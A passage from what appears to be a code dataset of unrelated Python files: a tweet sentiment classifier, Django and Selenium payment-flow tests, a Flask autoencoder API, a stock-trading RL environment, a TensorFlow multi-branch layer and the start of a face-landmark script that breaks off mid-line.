i+=1\r\n return list\r\n\r\n tweet_urls = url_finder(fname)\r\n\r\n def mention_finder(f_name):\r\n list = [None]*tweet_num\r\n i = 0\r\n pattern = r'[@]+'\r\n with open(f_name) as f:\r\n for line in f:\r\n list[i] = len(re.findall(pattern, line))/len(tweet_words[i])#all upper\r\n i+=1\r\n return list\r\n\r\n tweet_mentions = mention_finder(fname)\r\n def word_sentiment(f_name):\r\n list = [[] for _ in range(tweet_num)] #sentiment list for each tweet\r\n i = 0 #tweet index\r\n fail = 0 # number of failures\r\n with open(f_name) as f:\r\n line_list=[]\r\n for line in f:\r\n for word in line.split():\r\n word = word.lower() #remove lowercase and all previous expressions\r\n word = re.sub(r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', \"\",word)\r\n word = re.sub(r'[:)(;|/\\.?\\-!~^\",]+', \"\",word)\r\n line_list.append(word)\r\n for j in range(0,len(line_list)-2):\r\n try:\r\n try:\r\n arg = [line_list[j],\" \",(line_list[j+1])] #here we are just formatting the argument\r\n arg = ''.join(arg) #and find its lexicon value\r\n value = lexicon[arg]\r\n list[i].append(value)\r\n except KeyError:\r\n if(j==len(line)-3):\r\n list[i].append(lexicon[line_list[j+2]]) # this is the last word\r\n list[i].append(lexicon[line_list[j]]) #this is the word which didn't pair with the one after it\r\n except KeyError:\r\n fail+=1\r\n 
continue\r\n                i+=1\r\n                del line_list[:]\r\n        return list\r\n\r\n\r\n    tweet_word_sentiments = word_sentiment(fname)\r\n\r\n#tweet statistics extraction\r\n    tweet_statistics = [[]for _ in range(0,tweet_num)]\r\n    for i in range(0,tweet_num):\r\n        tweet_statistics[i].append(mean(tweet_word_sentiments[i]))# mean\r\n        tweet_statistics[i].append(min(list(map(float,tweet_word_sentiments[i]))))# min\r\n        tweet_statistics[i].append(max((list(map(float,tweet_word_sentiments[i])))))# max\r\n        tweet_statistics[i].extend((tweet_reps[i],tweet_punct[i],tweet_upper[i]))\r\n    return tweet_statistics\r\n\r\n\r\n##############################################################\r\n##################Classification of Tweets####################\r\n##############################################################\r\n\r\ndef target(fname):\r\n    target_data = []\r\n    with open(fname) as f:\r\n        for line in f:\r\n            for word in line.split():\r\n                target_data.append(word)\r\n\r\n    return target_data\r\n\r\ntweet_statistics = extract_tweet_sentiments(\"train.txt\")\r\ntest_statistics = extract_tweet_sentiments(\"test.txt\")\r\ntrain_labels = target(\"train.sen\")\r\ntest_labels = target(\"test.sen\")\r\nscaler = StandardScaler()\r\nscaler.fit(tweet_statistics)\r\nX_train = scaler.transform(tweet_statistics)\r\n# transform the test set with the scaler fitted on training data, to avoid leakage\r\nX_test = scaler.transform(test_statistics)\r\n\r\nclf = MLPClassifier(solver='adam', alpha=1e-5, random_state=1)\r\nclf.fit(X_train, train_labels)\r\n\r\nresults = (clf.predict(X_test))\r\nerror = 0\r\nf = open(\"results.txt\",\"w\")\r\n\r\nfor i in range(0,len(results)):\r\n    if results[i] == test_labels[i] :\r\n        f.write(results[i] + '\\n')\r\n        print(results[i] + '\\n')\r\n        continue\r\n    else:\r\n        f.write(results[i] + '\\n')\r\n        print(results[i] + '\\n')\r\n        error += 1\r\n\r\nf.close()\r\nsuccess_rate = 1 - error/len(test_labels)\r\nprint(success_rate)\r\n","sub_path":"TSA.py","file_name":"TSA.py","file_ext":"py","file_size_in_byte":8332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"277119758","text":"from unittest.mock import patch, mock_open\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom products.models import Product, Category, Favourite\nfrom django.core.management import call_command\nfrom .mock import MOCK_CATEGORIES, MOCK_OPENFF_REQUEST\n\n\nclass TestInitDB(TestCase):\n\n    @patch('products.management.commands.init_db.requests.get')\n    # replace open by mock_categories\n    @patch('builtins.open', mock_open(read_data=MOCK_CATEGORIES))\n    def test_init_db(self, mock_request):\n        # replace json by mock openff request with only 1 product\n        mock_request.return_value.json.return_value = MOCK_OPENFF_REQUEST\n        call_command('init_db')\n        count = Product.objects.all().count()\n        self.assertEqual(count, 1)\n        self.assertEqual(\n            Product.objects.get(code=3034470003107).name,\n            \"Benco original\")\n\n\nclass TestCleanDB(TestCase):\n\n    def test_clean_db(self):\n        user1 = User.objects.create_user(\n            'user1name',\n            'user1@email.com',\n            'user1password')\n        products = [Product.objects.create(code=str(i)) for i in range(2)]\n        Category.objects.create(id=\"fr:fruits\")\n        Favourite.objects.create(\n            healthy_product=products[0],\n            unhealthy_product=products[1],\n            owner=user1)\n\n        # Test clean only Products\n        call_command('clean_db')\n        count_prod = Product.objects.all().count()\n        count_cat = Category.objects.all().count()\n        count_fav = Favourite.objects.all().count()\n        self.assertEqual(count_prod, 0)\n        
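# categories are expected to survive a plain clean_db run\n        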
self.assertEqual(count_cat, 1)\n        self.assertEqual(count_fav, 0)\n\n        # Test clean also Categories\n        call_command('clean_db', '-all')\n        count_prod = Product.objects.all().count()\n        count_cat = Category.objects.all().count()\n        count_fav = Favourite.objects.all().count()\n        self.assertEqual(count_prod, 0)\n        self.assertEqual(count_cat, 0)\n        self.assertEqual(count_fav, 0)\n\n\n","sub_path":"products/tests/test_commands.py","file_name":"test_commands.py","file_ext":"py","file_size_in_byte":2044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"69768840","text":"\n\nfrom xai.brain.wordbase.nouns._gloat import _GLOAT\n\n# class header\nclass _GLOATING(_GLOAT, ):\n\tdef __init__(self,): \n\t\t_GLOAT.__init__(self)\n\t\tself.name = \"GLOATING\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"gloat\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_gloating.py","file_name":"_gloating.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"518424644","text":"import numpy as np\nfrom flask import Flask, request, jsonify\nimport pickle\nfrom tensorflow.keras.models import load_model\nimport pandas as pd\n\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler\n\nimport tensorflow as tf\n\n#from tensorflow.keras.models import *\n#from tensorflow.keras.layers import *\n#from tensorflow.keras import backend as K\n\n\n\napp = Flask(__name__)\nautoencoder = load_model('model.h5')\n\nwith open('scaler.pkl', 'rb') as f:\n    scaler = pickle.load(f)\n\nnodes = {'Bilbao, Basque Country, Spain': 1,\n         'Casablanca, Casablanca-Settat, Morocco': 3,\n         'Hamburg, Hamburg, Germany': 2,\n         'Kolwezi, Lualaba, Democratic Republic of the Congo': 4,\n         'Lysekil, Västra Götaland, Sweden': 10,\n         'Québec, Quebec, Canada': 8,\n         'Rotterdam, South Holland, Netherlands': 6,\n         'Shinkolobwe, Haut-Katanga, Democratic Republic of the Congo': 9,\n         'Skellefteå Airport, Västerbotten, Sweden': 7,\n         'Turku, Finland Proper, Finland': 5,\n         'Turku, Southwest Finland, Finland': 0}\n\n@app.route('/api',methods=['POST'])\ndef predict():\n    # Get the data from the POST request.\n    data = request.get_json(force=True) # Make prediction using model loaded from disk as per the data.\n    frm = data['from']\n    frm = nodes[frm]\n    frm = np.eye(11)[frm]\n    to = data['to']\n    to = nodes[to]\n    to = np.eye(11)[to]\n    t = np.array([data['time']])\n    t = scaler.transform(t.reshape(1, -1))\n\n    print('from: ', frm)\n    print('to: ', to)\n    print('time: ', t)\n    data = [[frm], [to], t]\n    print('data is: ', data)\n    score = autoencoder.evaluate(data, data)\n    output = score[0]\n    return jsonify(output)\n\n\nif __name__ == '__main__':\n    app.run(port=5000, debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118266730","text":"import unittest, time, logging\nfrom TestforUS1.webdriverFactory import WebdriverFactory\nfrom TestforUS1.Pages.welcomePage import Welcome\nfrom TestforUS1.Pages.loginPage import Login\nfrom TestforUS1.dataTests import DataTest\nfrom TestforUS1.Pages.mainUserPage import MainUserPage\nfrom TestforUS1.Pages.paymentsPage import PaymentsPage, PopupUtilityDetails, PopupSelectPaymentSum, PopupEasyPay\n\nclass Test(unittest.TestCase):\n\n    def setUp(self):\n        self.driver = WebdriverFactory.getWebdriver(DataTest.browser)\n        
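# open the application landing page before each test\n        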
self.driver.get(DataTest.url['home'])\n        self.welcomePage = Welcome(self.driver)\n        self.loginPage = Login(self.driver)\n        self.mainUserPage = MainUserPage(self.driver)\n        self.paymentPage = PaymentsPage(self.driver)\n        self.utilityDetailsPopup = PopupUtilityDetails(self.driver)\n        self.selectSumPopup = PopupSelectPaymentSum(self.driver)\n        self.easyPayPopup = PopupEasyPay(self.driver)\n\n    def getToPaymentDetailsPopup(self):\n        self.welcomePage.signIn()\n        self.loginPage.login(DataTest.popupEasyPay['email'],\n                             DataTest.popupEasyPay['password'])\n        self.mainUserPage.getToPaymentPage()\n        self.paymentPage.getPaymentDetails()\n\n    def loggerInfo(self,name):\n        self.logger = logging.getLogger()\n        self.logger.info(\"_\" * 10 + name)\n\n    def testCheckNoSaveCvcAfterRefresh(self):\n        name = unittest.TestCase.id(self)\n        self.loggerInfo(name)\n        self.getToPaymentDetailsPopup()\n        self.utilityDetailsPopup.clickButtonPay()\n\n        self.selectSumPopup.enterInputSum(DataTest.sumValue)\n        self.selectSumPopup.clickBtnDownload()\n        self.selectSumPopup.clickBtnProceed()\n\n        self.easyPayPopup.getToIframe()\n        self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n                                                 DataTest.popupEasyPay['dateCard'],\n                                                 DataTest.popupEasyPay['cvNumber'])\n\n        self.driver.refresh()\n\n        self.paymentPage.getPaymentDetails()\n        self.utilityDetailsPopup.clickButtonPay()\n\n        self.selectSumPopup.enterInputSum(DataTest.sumValue)\n        self.selectSumPopup.clickBtnDownload()\n        self.selectSumPopup.clickBtnProceed()\n\n        self.easyPayPopup.getToIframe()\n\n        self.cvNumber = self.easyPayPopup.getCvNumber()\n        self.assertEqual(self.cvNumber, '')\n\n    def testCheckNoSaveCardDataAfterRefresh(self):\n        name = unittest.TestCase.id(self)\n        self.loggerInfo(name)\n        self.getToPaymentDetailsPopup()\n        self.utilityDetailsPopup.clickButtonPay()\n\n        self.selectSumPopup.enterInputSum(DataTest.sumValue)\n        self.selectSumPopup.clickBtnDownload()\n        self.selectSumPopup.clickBtnProceed()\n\n        self.easyPayPopup.getToIframe()\n        self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n                                                 DataTest.popupEasyPay['dateCard'],\n                                                 DataTest.popupEasyPay['cvNumber'])\n\n        self.driver.refresh()\n\n        self.paymentPage.getPaymentDetails()\n        self.utilityDetailsPopup.clickButtonPay()\n\n        self.selectSumPopup.enterInputSum(DataTest.sumValue)\n        self.selectSumPopup.clickBtnDownload()\n        self.selectSumPopup.clickBtnProceed()\n\n        self.easyPayPopup.getToIframe()\n\n        cardNumber = self.easyPayPopup.getCardNumber()\n        self.assertEqual(cardNumber, '')\n\n    def testCheckBalanceAfterPay(self):\n        name = unittest.TestCase.id(self)\n        self.loggerInfo(name)\n        self.getToPaymentDetailsPopup()\n\n        balanceValue1 = self.paymentPage.getBalanceValue()\n        self.utilityDetailsPopup.clickButtonPay()\n\n        self.selectSumPopup.enterInputSum(DataTest.sumValue)\n        self.selectSumPopup.clickBtnDownload()\n        self.selectSumPopup.clickBtnProceed()\n\n        self.easyPayPopup.getToIframe()\n        self.easyPayPopup.fillPopupEasyPayFields(DataTest.popupEasyPay['cardNumber'],\n                                                 DataTest.popupEasyPay['dateCard'],\n                                                 DataTest.popupEasyPay['cvNumber'])\n        self.easyPayPopup.clickRememberMe()\n        self.easyPayPopup.fillAdditionalFieldsPopupEasy(DataTest.popupEasyPay['zipCode'],\n                                                        DataTest.popupEasyPay['phone'],\n                                                        DataTest.popupEasyPay['mail'])\n        self.easyPayPopup.clickBackPopupEasy()\n\n        self.driver.switch_to.default_content()\n        time.sleep(10)\n        self.driver.get(DataTest.url['paymentsPage'])\n        balanceValue2 = self.paymentPage.getBalanceValue()\n        result = balanceValue2 - balanceValue1\n        self.assertAlmostEqual(result, float(DataTest.sumValue), places=2)  # balances are floats, so compare with a tolerance\n\n    
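# Sketch of an explicit wait (assumes the driver factory returns a Selenium WebDriver);\n    # this would be less flaky than the fixed time.sleep(10) used above:\n    # from selenium.webdriver.support.ui import WebDriverWait\n    # WebDriverWait(self.driver, 30).until(\n    #     lambda d: self.paymentPage.getBalanceValue() != old_balance)  # old_balance read before paying\n\n    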
def tearDown(self):\n        self.driver.close()","sub_path":"Tests/testAllSviat.py","file_name":"testAllSviat.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"159888088","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 24 15:08:43 2019\n\n@author: s-long.bao\n\"\"\"\n\n\n# import libraries\nimport os\nimport sys\nimport gc\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.layers import Dense, Input\nfrom tensorflow.keras.optimizers import Adam\nfrom sklearn.preprocessing import StandardScaler\n\n# data clean\nroot_dir = r'C:\\Data_Science_Projects\\7.Stock_Recommender\\data\\market_info'\ndata_dir = r'C:\\Data_Science_Projects\\10.DDPG\\data'\n\ndef read_data(root_dir,data_dir,stocks=None):\n    # create daily return for stocks\n    file_name = 'preprocessed_stock_price.csv'\n    if os.path.isfile(os.path.join(data_dir,file_name)):\n        print(\"read stock price data ...\")\n        df_last = pd.read_csv(os.path.join(data_dir,file_name),index_col=0)\n    else:\n        print(\"preprocess stock price data ...\")\n        df = pd.read_csv(os.path.join(root_dir,'stock_price_20160101_20191031.csv'))\n        df.columns = df.columns.map(lambda s:s.lower())\n        df.day = pd.to_datetime(df.day)\n        df.set_index('day',inplace=True)\n\n        df_last = pd.pivot_table(df,columns='dscr_cd',values='off_last',index=df.index)\n        # df_last = df_last.dropna(axis='columns')\n        # df_last = df_last.replace(0, np.nan)\n        # df_last = df_last.fillna(method='ffill')\n\n        df_last = df_last.fillna(method='ffill')\n        df_last = df_last.dropna(axis='columns')\n\n        df_last = df_last.pct_change().dropna()\n        df_last = df_last.loc[:,df_last.sum()!=0]\n        df_last.to_csv(os.path.join(data_dir,file_name))\n\n    # return selected stocks\n    if stocks:\n        df_last = df_last[stocks]\n    return df_last\n\n\n# create environment\nclass MultiStockEnv:\n    \"\"\"\n    An n-stock trading environment.\n    State vector of size (n + n + 1):\n      # shares of stock n owned\n      # price of stock n\n      # cash owned\n    Action:\n    \"\"\"\n    def __init__(self, data, initial_investment=20000):\n        # data\n        self.stock_price_history = data\n        self.n_step, self.n_stock = self.stock_price_history.shape\n\n        # instance attributes\n        self.initial_investment = initial_investment\n        self.cur_step = None\n        self.stock_owned = None\n        self.stock_price = None\n        self.cash_in_hand = None\n        # self.action_space =\n        self.state_dim = self.n_stock * 2 + 1\n        self.reset()\n\n    def reset(self):\n        self.cur_step = 0\n        self.stock_owned = np.zeros(self.n_stock)\n        self.stock_price = self.stock_price_history[self.cur_step]\n        self.cash_in_hand = self.initial_investment\n        return self._get_obs()\n\n    def step(self, action):\n        # assert action in self.action_space\n        prev_val = self._get_val()\n\n        # update price, i.e. go to the next day\n
        self.cur_step += 1\n        self.stock_price = self.stock_price_history[self.cur_step]\n\n        # perform the trade\n        self._trade(action)\n\n        # get the new value after taking the action\n        cur_val = self._get_val()\n\n        # reward is the increase in portfolio value\n        reward = cur_val - prev_val\n\n        # done if we have run out of data\n        done = self.cur_step == self.n_step - 1\n\n        # store the current value of the portfolio here\n        info = {'cur_val': cur_val}\n\n        # conform to Gym API\n        return self._get_obs(), reward, done, info\n\n    def _get_obs(self):\n        obs = np.empty(self.state_dim)\n        obs[:self.n_stock] = self.stock_owned\n        obs[self.n_stock:2*self.n_stock] = self.stock_price\n        obs[-1] = self.cash_in_hand\n        return obs\n\n    def _get_val(self):\n        return self.stock_owned.dot(self.stock_price) + self.cash_in_hand\n\n    def _trade(self, action):\n        # action is the change in shares held; buying costs cash, selling frees it\n        self.stock_owned = self.stock_owned + action\n        self.cash_in_hand = self.cash_in_hand - action.dot(self.stock_price)\n","sub_path":"QuantitativeFinance/4.DDPG/bkup/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":4152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"532587740","text":"from django.urls import re_path, path\n\nfrom . import views\n\napp_name = 'ss_users'\n\nurlpatterns = [\n    path('id/', views.user_page, name='user_page'),\n    path('login/', views.login, name='login'),\n    path('logout/', views.logout, name='logout'),\n    path('registration/', views.registration, name='registration'),\n    path('email/', views.email, name='email'),\n    path('activate/uid=/token=/', views.activate_user_email, name='activate'),\n]\n","sub_path":"ss_users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"142219013","text":"\r\nalien_0 = {\r\n    'color':'blue',\r\n    'x-position':23,\r\n    'y-position':54,\r\n    'speed':'fast'\r\n    }\r\n\r\nalien_0['color'] = 'red'\r\nalien_0['speed'] = 'slow'\r\nalien_0['gun_point'] = 55\r\n\r\nprint('\\nThe '+alien_0['color']+' alien position is '+str(alien_0['x-position'])+','+str(alien_0['y-position']))\r\nif alien_0['color'] == 'green':\r\n    color_point = 5\r\nelif alien_0['color'] == 'blue':\r\n    color_point = 10\r\nelse:\r\n    color_point = 8\r\n\r\nif alien_0['speed'] == 'slow':\r\n    x_increment = 1\r\n    y_increment = 1\r\nelif alien_0['speed'] == 'medium':\r\n    x_increment = 2\r\n    y_increment = 2\r\nelse:\r\n    x_increment = 3\r\n    y_increment = 2\r\n\r\n# check the larger threshold first, otherwise the > 100 branch can never run\r\nif alien_0['gun_point'] > 100:\r\n    gun_p = 200\r\nelif alien_0['gun_point'] > 50:\r\n    gun_p = 100\r\nelse:\r\n    gun_p = 300\r\n\r\ntotal_point = color_point + gun_p\r\n\r\nalien_0['x-position'] = alien_0['x-position'] + x_increment\r\nalien_0['y-position'] = alien_0['y-position'] + y_increment\r\nprint('\\nThe '+alien_0['color']+' alien position is '+str(alien_0['x-position'])+','+str(alien_0['y-position']))\r\nprint('\\nAnd the Total Point is '+str(total_point))\r\n","sub_path":"alien_ex2.py","file_name":"alien_ex2.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"431686217","text":"import tensorflow as tf\nimport numpy as np\nfrom models.layer_cascade import LayerCascade\n\n\nclass LayerMultiBranch:\n\tdef __init__(self, _id, branches, merge=None, in_bottle=None, out_bottle=None):\n\t\tself._id = _id\n\t\tself.in_bottle = in_bottle\n\t\tself.branches = 
branches\n\t\tself.out_bottle = out_bottle\n\t\tself.merge = merge\n\t\tif self.merge == 'add':\n\t\t\tout_dim = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tout_dim.append(branch.out_features_dim)\n\t\t\tassert np.std(out_dim) == 0, '<%s> require the output dim of all branches are the same' % self.merge\n\t\telif self.merge is None:\n\t\t\tassert len(self.branches) == 1, 'Invalid'\n\t\t\n\t\tself.output_op = None\n\t\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\t\n\t@id.setter\n\tdef id(self, value):\n\t\tself._id = value\n\t\n\t@property\n\tdef out_features_dim(self):\n\t\tif self.out_bottle:\n\t\t\treturn self.out_bottle.out_features_dim\n\t\tout_dim = []\n\t\tfor branch in self.branches:\n\t\t\tout_dim.append(branch.out_features_dim)\n\t\tif self.merge == 'concat':\n\t\t\treturn np.sum(out_dim)\n\t\telif self.merge == 'add' or self.merge is None:\n\t\t\treturn out_dim[0]\n\t\telse:\n\t\t\tpass\n\t\n\t@property\n\tdef depth(self):\n\t\tdepth = 0\n\t\tif self.in_bottle:\n\t\t\tdepth += self.in_bottle.depth\n\t\tif self.out_bottle:\n\t\t\tdepth += self.out_bottle.depth\n\t\tbranch_depth = []\n\t\tfor branch in self.branches:\n\t\t\tbranch_depth.append(branch.depth)\n\t\tdepth += np.max(branch_depth)\n\t\treturn depth\n\t\n\tdef get_str(self):\n\t\tin_bottle_str = 'N' if self.in_bottle is None else self.in_bottle.get_str()\n\t\tbranches_str = [branch.get_str() for branch in self.branches]\n\t\tbranches_str = '+'.join(branches_str)\n\t\tout_bottle_str = 'N' if self.out_bottle is None else self.out_bottle.get_str()\n\t\treturn '%s~%s~%s' % (in_bottle_str, branches_str, out_bottle_str)\n\t\n\tdef build(self, _input, densenet, store_output_op=False):\n\t\twith tf.variable_scope(self._id):\n\t\t\toutput = _input\n\t\t\t# in bottle\n\t\t\tif self.in_bottle:\n\t\t\t\toutput = self.in_bottle.build(output, densenet, store_output_op=store_output_op)\n\t\t\t# branches\n\t\t\tbranch_out = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tbranch_out.append(branch.build(output, densenet, store_output_op=store_output_op))\n\t\t\tif self.merge == 'concat':\n\t\t\t\toutput = tf.concat(branch_out, axis=3)\n\t\t\telif self.merge == 'add':\n\t\t\t\toutput = tf.add_n(branch_out)\n\t\t\telif self.merge is None:\n\t\t\t\toutput = branch_out[0]\n\t\t\telse:\n\t\t\t\traise ValueError('Do not support <%s>' % self.merge)\n\t\t\t# out bottle\n\t\t\tif self.out_bottle:\n\t\t\t\toutput = self.out_bottle.build(output, densenet, store_output_op=store_output_op)\n\t\tif store_output_op:\n\t\t\tself.output_op = output\n\t\treturn output\n\t\n\tdef get_config(self):\n\t\treturn {\n\t\t\t'_id': self._id,\n\t\t\t'merge': self.merge,\n\t\t\t'branches': [branch.get_config() for branch in self.branches],\n\t\t\t'in_bottle': None if self.in_bottle is None else self.in_bottle.get_config(),\n\t\t\t'out_bottle': None if self.out_bottle is None else self.out_bottle.get_config(),\n\t\t}\n\t\n\tdef renew_init(self, densenet):\n\t\treturn {\n\t\t\t'_id': self._id,\n\t\t\t'branches': [branch.renew_init(densenet) for branch in self.branches],\n\t\t\t'in_bottle': None if self.in_bottle is None else self.in_bottle.renew_init(densenet),\n\t\t\t'out_bottle': None if self.out_bottle is None else self.out_bottle.renew_init(densenet),\n\t\t}\n\t\n\t@staticmethod\n\tdef set_from_config(config_json, init=None):\n\t\t_id = config_json['_id']\n\t\tmerge = config_json['merge']\n\t\tbranches = []\n\t\tfor _i, branch_config in enumerate(config_json['branches']):\n\t\t\tbranch_init = init['branches'][_i] if init is not None else 
None\n\t\t\tbranch = LayerCascade.set_from_config(branch_config, branch_init)\n\t\t\tbranches.append(branch)\n\t\tin_bottle = config_json['in_bottle']\n\t\tif in_bottle:\n\t\t\tin_bottle_init = init['in_bottle'] if init is not None else None\n\t\t\tin_bottle = LayerCascade.set_from_config(in_bottle, in_bottle_init)\n\t\tout_bottle = config_json['out_bottle']\n\t\tif out_bottle:\n\t\t\tout_bottle_init = init['out_bottle'] if init is not None else None\n\t\t\tout_bottle = LayerCascade.set_from_config(out_bottle, out_bottle_init)\n\t\treturn LayerMultiBranch(_id, branches, merge, in_bottle=in_bottle, out_bottle=out_bottle)\n\t\n\t\"\"\"\n\tNetwork Transformation Operations\n\t\"\"\"\n\t\n\tdef prev_widen(self, indices, magnifier, noise=None):\n\t\tif self.in_bottle:\n\t\t\tself.in_bottle.prev_widen(indices, magnifier, noise=noise)\n\t\telse:\n\t\t\tfor branch in self.branches:\n\t\t\t\tbranch.prev_widen(indices, magnifier, noise=noise)\n\t\n\tdef widen(self, loc, new_width, widen_type='output_dim', noise=None):\n\t\tif loc['multi-branch'] == 'in_bottle':\n\t\t\tassert self.in_bottle is not None, 'Invalid'\n\t\t\tchange_out_dim, indices, magnifier = self.in_bottle.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\tif change_out_dim:\n\t\t\t\tfor branch in self.branches:\n\t\t\t\t\tbranch.prev_widen(indices, magnifier, noise=noise)\n\t\t\treturn False, None, None\n\t\telif loc['multi-branch'] == 'out_bottle':\n\t\t\tassert self.out_bottle is not None, 'Invalid'\n\t\t\tchange_out_dim, indices, magnifier = self.out_bottle.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\treturn change_out_dim, indices, magnifier\n\t\telif loc['multi-branch'] == 'branch':\n\t\t\tbranch_idx = loc['branch']\n\t\t\tbranch = self.branches[branch_idx]\n\t\t\told_branch_out_dim = branch.out_features_dim\n\t\t\tchange_out_dim, indices, magnifier = branch.widen(loc['layer'], new_width, widen_type, noise=noise)\n\t\t\tif change_out_dim:\n\t\t\t\tassert self.merge != 'add', 'Invalid'\n\t\t\t\tprev_branch_out_dim = 0\n\t\t\t\tfor _i in range(0, branch_idx):\n\t\t\t\t\tprev_branch_out_dim += self.branches[_i].out_features_dim\n\t\t\t\tpost_branch_out_dim = 0\n\t\t\t\tfor _i in range(branch_idx + 1, len(self.branches)):\n\t\t\t\t\tpost_branch_out_dim += self.branches[_i].out_features_dim\n\t\t\t\told_size = prev_branch_out_dim + old_branch_out_dim + post_branch_out_dim\n\t\t\t\tbase = np.arange(old_size)\n\t\t\t\tindices = np.concatenate([\n\t\t\t\t\tbase[:prev_branch_out_dim],\n\t\t\t\t\tindices + prev_branch_out_dim,\n\t\t\t\t\tbase[prev_branch_out_dim + old_branch_out_dim:]\n\t\t\t\t])\n\t\t\t\tmagnifier = np.concatenate([\n\t\t\t\t\t[1] * prev_branch_out_dim,\n\t\t\t\t\tmagnifier,\n\t\t\t\t\t[1] * post_branch_out_dim,\n\t\t\t\t])\n\t\t\t\tif self.out_bottle is None:\n\t\t\t\t\treturn True, indices, magnifier\n\t\t\t\telse:\n\t\t\t\t\tself.out_bottle.prev_widen(indices, magnifier, noise=noise)\n\t\t\t\t\treturn False, None, None\n\t\t\telse:\n\t\t\t\treturn False, None, None\n\t\telse:\n\t\t\traise ValueError('Do not support %s' % loc['multi-branch'])\n\t\n\tdef deepen(self, loc, new_layer_config, input_dim):\n\t\tif loc['multi-branch'] == 'in_bottle':\n\t\t\tassert self.in_bottle is not None, 'Invalid'\n\t\t\treturn self.in_bottle.deepen(loc['layer'], new_layer_config, input_dim)\n\t\telif loc['multi-branch'] == 'out_bottle':\n\t\t\tassert self.out_bottle is not None, 'Invalid'\n\t\t\tif self.merge == 'concat': input_dim = np.sum([branch.out_features_dim for branch in self.branches])\n\t\t\telse: 
input_dim = self.branches[0].out_features_dim\n\t\t\treturn self.out_bottle.deepen(loc['layer'], new_layer_config, input_dim)\n\t\telif loc['multi-branch'] == 'branch':\n\t\t\tif self.in_bottle is not None: input_dim = self.in_bottle.out_features_dim\n\t\t\treturn self.branches[loc['branch']].deepen(loc['layer'], new_layer_config, input_dim)\n\t\telse:\n\t\t\traise ValueError('Do not support %s' % loc['multi-branch'])\n\t\t\n\tdef remapped_branches(self, noise=None):\n\t\tif self.merge == 'add' or self.merge is None:\n\t\t\tsize = self.out_features_dim\n\t\t\tindices = np.random.choice(np.arange(size), size)\n\t\t\tnew_branches = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tnew_layers = [layer.copy() for layer in branch.layers[:-1]]\n\t\t\t\tlast_layer = branch.layers[-1].copy().remap(indices, noise=noise)\n\t\t\t\tnew_layers.append(last_layer)\n\t\t\t\tnew_branch = LayerCascade(branch.id, new_layers)\n\t\t\t\tnew_branches.append(new_branch)\n\t\telif self.merge == 'concat':\n\t\t\tnew_branches = []\n\t\t\toffset = 0\n\t\t\tindices = []\n\t\t\tfor branch in self.branches:\n\t\t\t\tsize = branch.out_features_dim\n\t\t\t\tsub_indices = np.random.choice(np.arange(size), size)\n\t\t\t\tnew_layers = [layer.copy() for layer in branch.layers[:-1]]\n\t\t\t\tlast_layer = branch.layers[-1].copy().remap(sub_indices, noise=noise)\n\t\t\t\tnew_layers.append(last_layer)\n\t\t\t\tnew_branch = LayerCascade(branch.id, new_layers)\n\t\t\t\tnew_branches.append(new_branch)\n\t\t\t\tindices.append(sub_indices + offset)\n\t\t\t\toffset += size\n\t\t\tindices = np.concatenate(indices)\n\t\telse:\n\t\t\traise NotImplementedError\n\t\treturn new_branches, indices\n","sub_path":"code/models/layer_multi_branch.py","file_name":"layer_multi_branch.py","file_ext":"py","file_size_in_byte":8211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"622167054","text":"import face_alignment\nimport numpy as np\nimport argparse\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport os, sys\nimport dlib\nimport imutils\nimport cv2\n\n\n# Run the 3D face alignment on a test image, without CUDA.\nfa = face_alignment.FaceAlignment(face_alignment.LandmarksType._3D, device='cpu',flip_input=False)\n\nABS_PATh = os.path.dirname(os.path.abspath(__file__)) + \"/\"\n\n# Instantiate the parser\nparser = argparse.ArgumentParser(description='a crop utility')\n\next = (\".avi\", \".mp4\")\n\nparser.add_argument('-d', '--dir_to_process', type=str, nargs='?',\n help='dir_to_process')\nparser.add_argument('-o', '--out_to_csv_file',type=str, nargs='?',\n help='if provided output will be writtent to csv(semicolon separated) otherwise to stdout. ')\nparser.add_argument('-ik', '--is_keep_extracted_image', action='store_true', help='A boolean True False')\n\ndetector = dlib.get_frontal_face_detector()\n\n# input = io.imread('../test/__assets/img1.jpeg')\n# preds = fa.get_landmarks(input)[-1]\n\nFLAGS = parser.parse_args()\n\nif FLAGS.dir_to_process == \"\":\n paths = [] #specify static here\nelse:\n paths 